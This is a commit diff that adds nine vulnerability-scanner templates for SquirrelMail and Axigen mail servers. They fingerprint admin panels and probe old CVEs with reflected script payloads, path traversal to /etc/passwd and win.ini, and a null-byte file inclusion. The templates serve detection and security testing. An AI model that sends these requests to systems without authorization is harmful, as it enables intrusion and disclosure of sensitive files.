commit
cacf934f38
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2002-1131
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||||
|
reference: https://www.exploit-db.com/exploits/21811
|
||||||
|
tags: xss,squirrelmail,cve,cve2002
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
|
||||||
|
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
|
||||||
|
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2004-0519
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
|
||||||
|
reference: https://www.exploit-db.com/exploits/24068
|
||||||
|
tags: xss,squirrelmail,cve2004,cve
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: CVE-2006-2842
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
|
||||||
|
reference: https://www.exploit-db.com/exploits/27948
|
||||||
|
tags: cve2006,lfi,squirrelmail,cve
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: CVE-2012-4940
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Axigen Mail Server - 'Filename' Directory Traversal
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
|
||||||
|
reference: https://www.exploit-db.com/exploits/37996
|
||||||
|
tags: cve,cve2012,axigen,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini'
|
||||||
|
- '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "bit app support"
|
||||||
|
- "fonts"
|
||||||
|
- "extensions"
|
||||||
|
condition: and
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: axigen-webadmin
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Axigen Web Admin
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"Axigen WebAdmin"'
|
||||||
|
tags: axigen,panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Axigen WebAdmin</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: axigen-webmail
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Axigen WebMail
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"Axigen WebMail"'
|
||||||
|
tags: axigen,panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Axigen WebMail</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: squirrelmail-vkeyboard-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
description: SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||||
|
reference: https://www.exploit-db.com/exploits/26305
|
||||||
|
tags: xss,squirrelmail
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: squirrelmail-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SquirrelMail 1.2.11 Local File Inclusion
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
reference: https://www.exploit-db.com/exploits/22793
|
||||||
|
tags: lfi,squirrelmail
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/src/read_body.php?mailbox=/etc/passwd&passed_id=1&"
|
||||||
|
- "{{BaseURL}}/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: squirrelmail-vkeyboard-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||||
|
reference: https://www.exploit-db.com/exploits/34814
|
||||||
|
tags: xss,squirrelmail
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
Loading…
Reference in New Issue